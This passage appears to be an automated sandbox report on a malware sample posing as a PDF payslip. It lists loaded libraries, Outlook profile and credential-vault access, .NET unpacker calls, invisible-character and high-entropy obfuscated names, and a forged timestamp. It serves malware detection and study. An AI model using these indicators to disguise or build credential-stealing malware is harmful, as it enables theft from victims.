                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Payslip_October_2024_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payslip_October_2024_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Payslip_October_2024_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: eopJ.pdb source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr
                    Source: Binary string: eopJ.pdbSHA256 source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.cs.Net Code: AbTT8O94en System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.54b0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.39d72f8.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.cs.Net Code: AbTT8O94en System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.cs.Net Code: AbTT8O94en System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.39b72d8.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: Payslip_October_2024_pdf.exeStatic PE information: 0xA7C547C1 [Wed Mar 12 19:47:13 2059 UTC]
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_0274E768 pushfd ; retf 0_2_0274E769
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0167E768 pushfd ; retf 4_2_0167E769
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02CEF7C8 pushad ; retf 5_2_02CEF7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02CE0C55 push edi; retf 5_2_02CE0C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_0302E768 pushfd ; retf 7_2_0302E769
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013CF7C8 pushad ; retf 8_2_013CF7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013C0C55 push edi; retf 8_2_013C0C7A
                    Source: Payslip_October_2024_pdf.exeStatic PE information: section name: .text entropy: 7.659760721121941
                    Source: sgxIb.exe.3.drStatic PE information: section name: .text entropy: 7.659760721121941
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, LeX4FpN6i9lh5NCcFF.csHigh entropy of concatenated method names: 'iRxIsgdJHo', 'jePIvoH9pP', 'zBoIjiV0hj', 'MtDjUDHBr4', 'B88jzlmJx3', 'Ss3Io40h8x', 'dkDImay5pP', 'zKPIaxLqGg', 'YV4IFCDoO6', 'OSLITf2MoY'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, YbeSGBq7nB9iDUIwaD.csHigh entropy of concatenated method names: 'KgWP5D9VQY', 'Tb0PZ0npiJ', 'dnSvAWySKC', 'XcZvwqeVqw', 'hF8vuws7mT', 'Nm2vJHqUc7', 'F3mvNcQZ6s', 'p5KvR9anqa', 'Cj3vnu3rUO', 'sp7vcbWTgO'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, eEULqaLTsaeIwLQZoi.csHigh entropy of concatenated method names: 'mFFj1L8Xfi', 'v58jpU0PDK', 'BPxjPcnVQG', 'tHBjINrjTw', 'r44jByArHK', 'ex2P4riCOI', 'hETPKLJulF', 'UeYPHBqkbI', 'XrRPETgJaI', 'TK3POuv8NU'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.csHigh entropy of concatenated method names: 'QWEF1AXdKW', 'kQIFstr0Yg', 'l1kFpv4ewi', 'y4oFvGJ8KM', 'd69FPTMvaE', 'vBOFjx8EXk', 'KEaFIL5vUe', 'PmXFBpTwDx', 'iLTFCfKl5p', 'lWgFQ1kXiw'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, l1hZG5aV7hCTL71C8h.csHigh entropy of concatenated method names: 'Mk88u1J5M', 'DqP35QLWB', 'rRyxtv7kB', 'fi9Z405ui', 'wwidyN83Z', 'ibwq12bvp', 'UavVqaVideFgQohqB2', 'GjGBRBQ8AFk6nMoGSX', 'FobfR5GHF', 'NPPh4juk6'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, nV21fcXrTc5iuW9NMa.csHigh entropy of concatenated method names: 'nJYgQ2brUQ', 'P9lgiUXMGt', 'ToString', 'CCRgsdiLR5', 'EtZgpTARAA', 'fCPgvNGSOS', 'XTVgPvj0e7', 'Nfqgjl2kjK', 'wtrgInOUD9', 'ABfgBpiAu7'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, JnbD2KUM8G8JBgsAof.csHigh entropy of concatenated method names: 'KKJMmktD3Y', 'vZ7MFYgHBU', 'FxyMToDORn', 'EJnMsNkfAt', 'vy2MpSD2mk', 'tYaMPZrhSI', 'w1pMjs2Dqq', 'tSjfHymZCR', 'zAufEPZmJM', 'VDofOYZkCP'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, IOPXjUeqXlyqXiL1A6.csHigh entropy of concatenated method names: 'ROIY0J7u8s', 'b8kYddKQEF', 'VhaYLoic86', 'ifxYlx3ceZ', 'R1yYwYVZCv', 'zaCYuTbfSR', 'zCoYNujK2U', 'poDYRyKd6W', 'OwiYchaV5s', 'JEjYDMCilJ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, NOQnugKbQgmf98fjro.csHigh entropy of concatenated method names: 'ldAgEKp0RX', 'NX3gUXy864', 'BoFfoeFJZp', 'fIsfmFvWPh', 'Y7jgDyJVIi', 'Ltog7cEvQx', 'c9MgeAlcX3', 'LingG3OAnW', 'avlgtjYdU9', 'ydOg2MCevt'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, HhRnp80YNIZjcH3iKc.csHigh entropy of concatenated method names: 'EHOpGrU3ov', 'lDJptlqCia', 'ryRp2IN35O', 'VFopXYGIIE', 'bAAp4IXtgV', 'Mh2pKYyP0y', 'hKOpH8nMXg', 'cmTpEQWvHY', 'g6XpO003fp', 'caIpU7iFg6'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, Gn7jTymF8Guf4n5v8c8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IHmhGF2M6i', 'DiuhtVDqwP', 'KPuh2yhjCw', 'qZ7hXwxGvV', 'gbwh4vF9ZZ', 'bXMhK7iiwU', 'i25hHCwbgg'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, ir7xw0dQgUU613gg97.csHigh entropy of concatenated method names: 'Jyiv3J51ig', 'BhUvxs3eTN', 'YU4v08Ilq6', 'j5BvdaiQRJ', 'SSBv6VWJrT', 'fkKvSEa5YB', 'GsevgmxuDV', 'wiQvfIkhKg', 'pnsvMOuMSm', 'pjMvhZgTql'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, NUh8tJG3dF1wRcPdyC.csHigh entropy of concatenated method names: 'S5y6cy7CyG', 'ACx67uvpWb', 'v6j6GL3RTR', 'Ios6tY1kE4', 'nto6leskns', 'e5N6AU36Ox', 'TLn6w1baHw', 'YZZ6uBkrQN', 'zEi6JeOOHu', 'bAw6NISg4w'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, dIqP5DOFjSuxjC5UrE.csHigh entropy of concatenated method names: 'apffLRurEj', 'G9qfl8EbyO', 'qFAfAPMaUG', 'y6DfwBRlKH', 'cZRfGQeGFd', 'V9rfuvem38', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, b7HwaCzHwTk3HmbbLI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'utqMYi602h', 'qhOM6AlAmY', 'L4PMSLKJjg', 'Yc3MgKbiU4', 'PUEMfMmReH', 'GcpMMA306Y', 'zUuMhTQOVQ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, nBTdErmm9l7KcE2fpCx.csHigh entropy of concatenated method names: 'ToString', 'FaShFoqk5Z', 'VXBhTffu2e', 'qg3h1XoH4D', 'foOhsBRg53', 'CoUhpI1Mnh', 'ySjhvs7glP', 'OXshP6jVuX', 'Bm368G6OfsnuqYT6G7X', 'bJDa9E60W2ybRNiKAPZ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, Wj329MTPLq1QqODYbJ.csHigh entropy of concatenated method names: 'USlmIhRnp8', 'oNImBZjcH3', 'DQgmQUU613', 'pg9mi7UbeS', 'YIwm6aD1EU', 'GqamSTsaeI', 'zL1iPt2iEockm3kLrO', 'UA8nddJ0oEjcTZCnrg', 'nBMmmyjNDI', 'qYMmFm7XbX'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, YZs4uRpVZWp8IRtc8l.csHigh entropy of concatenated method names: 'Dispose', 'PxtmOrxEmo', 'kBualDUWZQ', 'pVKwwVfQx7', 'bJBmUPPT1W', 'Iw1mzmPWbm', 'ProcessDialogKey', 'sbTaoIqP5D', 'djSamuxjC5', 'YrEaaunbD2'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, MiCEWYmoJa161u2i4UQ.csHigh entropy of concatenated method names: 'F24MyLGFRk', 'TmOMWKbwfW', 'Jg1M8f7ETt', 'kRvM3wNDnF', 'tq2M5m3C9j', 'ANqMxTIxY5', 'y3uMZmM9WI', 'a7jM0ixOAa', 'yvtMd1l3QO', 'BoIMqmjaUR'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, KBPPT1EWww1mPWbmMb.csHigh entropy of concatenated method names: 'GcofsG1Esn', 'Yr1fp8JLxS', 'U6vfvYUKKX', 'hqafPdxlO6', 'XOdfjRQDN7', 'EKRfI4DKjE', 'trDfBhmEXy', 'FS0fCBtRJc', 'tSbfQVAq17', 'u5Cfi6o2Xw'
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, TTWhxAnE79rwZHoEYw.csHigh entropy of concatenated method names: 'S8nIyGC0My', 'rieIWGJDJx', 'nOEI8TW8Fw', 'dw1I3UfvKo', 'mxnI5K7aZI', 'MQSIx6EWcy', 'BUJIZxjZLL', 'YngI0b0Nc4', 'OQCIdw7XYJ', 'dx9IqHRr9Z'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, LeX4FpN6i9lh5NCcFF.csHigh entropy of concatenated method names: 'iRxIsgdJHo', 'jePIvoH9pP', 'zBoIjiV0hj', 'MtDjUDHBr4', 'B88jzlmJx3', 'Ss3Io40h8x', 'dkDImay5pP', 'zKPIaxLqGg', 'YV4IFCDoO6', 'OSLITf2MoY'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, YbeSGBq7nB9iDUIwaD.csHigh entropy of concatenated method names: 'KgWP5D9VQY', 'Tb0PZ0npiJ', 'dnSvAWySKC', 'XcZvwqeVqw', 'hF8vuws7mT', 'Nm2vJHqUc7', 'F3mvNcQZ6s', 'p5KvR9anqa', 'Cj3vnu3rUO', 'sp7vcbWTgO'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, eEULqaLTsaeIwLQZoi.csHigh entropy of concatenated method names: 'mFFj1L8Xfi', 'v58jpU0PDK', 'BPxjPcnVQG', 'tHBjINrjTw', 'r44jByArHK', 'ex2P4riCOI', 'hETPKLJulF', 'UeYPHBqkbI', 'XrRPETgJaI', 'TK3POuv8NU'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.csHigh entropy of concatenated method names: 'QWEF1AXdKW', 'kQIFstr0Yg', 'l1kFpv4ewi', 'y4oFvGJ8KM', 'd69FPTMvaE', 'vBOFjx8EXk', 'KEaFIL5vUe', 'PmXFBpTwDx', 'iLTFCfKl5p', 'lWgFQ1kXiw'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, l1hZG5aV7hCTL71C8h.csHigh entropy of concatenated method names: 'Mk88u1J5M', 'DqP35QLWB', 'rRyxtv7kB', 'fi9Z405ui', 'wwidyN83Z', 'ibwq12bvp', 'UavVqaVideFgQohqB2', 'GjGBRBQ8AFk6nMoGSX', 'FobfR5GHF', 'NPPh4juk6'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, nV21fcXrTc5iuW9NMa.csHigh entropy of concatenated method names: 'nJYgQ2brUQ', 'P9lgiUXMGt', 'ToString', 'CCRgsdiLR5', 'EtZgpTARAA', 'fCPgvNGSOS', 'XTVgPvj0e7', 'Nfqgjl2kjK', 'wtrgInOUD9', 'ABfgBpiAu7'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, JnbD2KUM8G8JBgsAof.csHigh entropy of concatenated method names: 'KKJMmktD3Y', 'vZ7MFYgHBU', 'FxyMToDORn', 'EJnMsNkfAt', 'vy2MpSD2mk', 'tYaMPZrhSI', 'w1pMjs2Dqq', 'tSjfHymZCR', 'zAufEPZmJM', 'VDofOYZkCP'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, IOPXjUeqXlyqXiL1A6.csHigh entropy of concatenated method names: 'ROIY0J7u8s', 'b8kYddKQEF', 'VhaYLoic86', 'ifxYlx3ceZ', 'R1yYwYVZCv', 'zaCYuTbfSR', 'zCoYNujK2U', 'poDYRyKd6W', 'OwiYchaV5s', 'JEjYDMCilJ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, NOQnugKbQgmf98fjro.csHigh entropy of concatenated method names: 'ldAgEKp0RX', 'NX3gUXy864', 'BoFfoeFJZp', 'fIsfmFvWPh', 'Y7jgDyJVIi', 'Ltog7cEvQx', 'c9MgeAlcX3', 'LingG3OAnW', 'avlgtjYdU9', 'ydOg2MCevt'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, HhRnp80YNIZjcH3iKc.csHigh entropy of concatenated method names: 'EHOpGrU3ov', 'lDJptlqCia', 'ryRp2IN35O', 'VFopXYGIIE', 'bAAp4IXtgV', 'Mh2pKYyP0y', 'hKOpH8nMXg', 'cmTpEQWvHY', 'g6XpO003fp', 'caIpU7iFg6'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, Gn7jTymF8Guf4n5v8c8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IHmhGF2M6i', 'DiuhtVDqwP', 'KPuh2yhjCw', 'qZ7hXwxGvV', 'gbwh4vF9ZZ', 'bXMhK7iiwU', 'i25hHCwbgg'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, ir7xw0dQgUU613gg97.csHigh entropy of concatenated method names: 'Jyiv3J51ig', 'BhUvxs3eTN', 'YU4v08Ilq6', 'j5BvdaiQRJ', 'SSBv6VWJrT', 'fkKvSEa5YB', 'GsevgmxuDV', 'wiQvfIkhKg', 'pnsvMOuMSm', 'pjMvhZgTql'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, NUh8tJG3dF1wRcPdyC.csHigh entropy of concatenated method names: 'S5y6cy7CyG', 'ACx67uvpWb', 'v6j6GL3RTR', 'Ios6tY1kE4', 'nto6leskns', 'e5N6AU36Ox', 'TLn6w1baHw', 'YZZ6uBkrQN', 'zEi6JeOOHu', 'bAw6NISg4w'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, dIqP5DOFjSuxjC5UrE.csHigh entropy of concatenated method names: 'apffLRurEj', 'G9qfl8EbyO', 'qFAfAPMaUG', 'y6DfwBRlKH', 'cZRfGQeGFd', 'V9rfuvem38', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, b7HwaCzHwTk3HmbbLI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'utqMYi602h', 'qhOM6AlAmY', 'L4PMSLKJjg', 'Yc3MgKbiU4', 'PUEMfMmReH', 'GcpMMA306Y', 'zUuMhTQOVQ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, nBTdErmm9l7KcE2fpCx.csHigh entropy of concatenated method names: 'ToString', 'FaShFoqk5Z', 'VXBhTffu2e', 'qg3h1XoH4D', 'foOhsBRg53', 'CoUhpI1Mnh', 'ySjhvs7glP', 'OXshP6jVuX', 'Bm368G6OfsnuqYT6G7X', 'bJDa9E60W2ybRNiKAPZ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, Wj329MTPLq1QqODYbJ.csHigh entropy of concatenated method names: 'USlmIhRnp8', 'oNImBZjcH3', 'DQgmQUU613', 'pg9mi7UbeS', 'YIwm6aD1EU', 'GqamSTsaeI', 'zL1iPt2iEockm3kLrO', 'UA8nddJ0oEjcTZCnrg', 'nBMmmyjNDI', 'qYMmFm7XbX'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, YZs4uRpVZWp8IRtc8l.csHigh entropy of concatenated method names: 'Dispose', 'PxtmOrxEmo', 'kBualDUWZQ', 'pVKwwVfQx7', 'bJBmUPPT1W', 'Iw1mzmPWbm', 'ProcessDialogKey', 'sbTaoIqP5D', 'djSamuxjC5', 'YrEaaunbD2'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, MiCEWYmoJa161u2i4UQ.csHigh entropy of concatenated method names: 'F24MyLGFRk', 'TmOMWKbwfW', 'Jg1M8f7ETt', 'kRvM3wNDnF', 'tq2M5m3C9j', 'ANqMxTIxY5', 'y3uMZmM9WI', 'a7jM0ixOAa', 'yvtMd1l3QO', 'BoIMqmjaUR'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, KBPPT1EWww1mPWbmMb.csHigh entropy of concatenated method names: 'GcofsG1Esn', 'Yr1fp8JLxS', 'U6vfvYUKKX', 'hqafPdxlO6', 'XOdfjRQDN7', 'EKRfI4DKjE', 'trDfBhmEXy', 'FS0fCBtRJc', 'tSbfQVAq17', 'u5Cfi6o2Xw'
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, TTWhxAnE79rwZHoEYw.csHigh entropy of concatenated method names: 'S8nIyGC0My', 'rieIWGJDJx', 'nOEI8TW8Fw', 'dw1I3UfvKo', 'mxnI5K7aZI', 'MQSIx6EWcy', 'BUJIZxjZLL', 'YngI0b0Nc4', 'OQCIdw7XYJ', 'dx9IqHRr9Z'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, LeX4FpN6i9lh5NCcFF.csHigh entropy of concatenated method names: 'iRxIsgdJHo', 'jePIvoH9pP', 'zBoIjiV0hj', 'MtDjUDHBr4', 'B88jzlmJx3', 'Ss3Io40h8x', 'dkDImay5pP', 'zKPIaxLqGg', 'YV4IFCDoO6', 'OSLITf2MoY'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, YbeSGBq7nB9iDUIwaD.csHigh entropy of concatenated method names: 'KgWP5D9VQY', 'Tb0PZ0npiJ', 'dnSvAWySKC', 'XcZvwqeVqw', 'hF8vuws7mT', 'Nm2vJHqUc7', 'F3mvNcQZ6s', 'p5KvR9anqa', 'Cj3vnu3rUO', 'sp7vcbWTgO'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, eEULqaLTsaeIwLQZoi.csHigh entropy of concatenated method names: 'mFFj1L8Xfi', 'v58jpU0PDK', 'BPxjPcnVQG', 'tHBjINrjTw', 'r44jByArHK', 'ex2P4riCOI', 'hETPKLJulF', 'UeYPHBqkbI', 'XrRPETgJaI', 'TK3POuv8NU'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.csHigh entropy of concatenated method names: 'QWEF1AXdKW', 'kQIFstr0Yg', 'l1kFpv4ewi', 'y4oFvGJ8KM', 'd69FPTMvaE', 'vBOFjx8EXk', 'KEaFIL5vUe', 'PmXFBpTwDx', 'iLTFCfKl5p', 'lWgFQ1kXiw'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, l1hZG5aV7hCTL71C8h.csHigh entropy of concatenated method names: 'Mk88u1J5M', 'DqP35QLWB', 'rRyxtv7kB', 'fi9Z405ui', 'wwidyN83Z', 'ibwq12bvp', 'UavVqaVideFgQohqB2', 'GjGBRBQ8AFk6nMoGSX', 'FobfR5GHF', 'NPPh4juk6'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, nV21fcXrTc5iuW9NMa.csHigh entropy of concatenated method names: 'nJYgQ2brUQ', 'P9lgiUXMGt', 'ToString', 'CCRgsdiLR5', 'EtZgpTARAA', 'fCPgvNGSOS', 'XTVgPvj0e7', 'Nfqgjl2kjK', 'wtrgInOUD9', 'ABfgBpiAu7'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, JnbD2KUM8G8JBgsAof.csHigh entropy of concatenated method names: 'KKJMmktD3Y', 'vZ7MFYgHBU', 'FxyMToDORn', 'EJnMsNkfAt', 'vy2MpSD2mk', 'tYaMPZrhSI', 'w1pMjs2Dqq', 'tSjfHymZCR', 'zAufEPZmJM', 'VDofOYZkCP'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, IOPXjUeqXlyqXiL1A6.csHigh entropy of concatenated method names: 'ROIY0J7u8s', 'b8kYddKQEF', 'VhaYLoic86', 'ifxYlx3ceZ', 'R1yYwYVZCv', 'zaCYuTbfSR', 'zCoYNujK2U', 'poDYRyKd6W', 'OwiYchaV5s', 'JEjYDMCilJ'
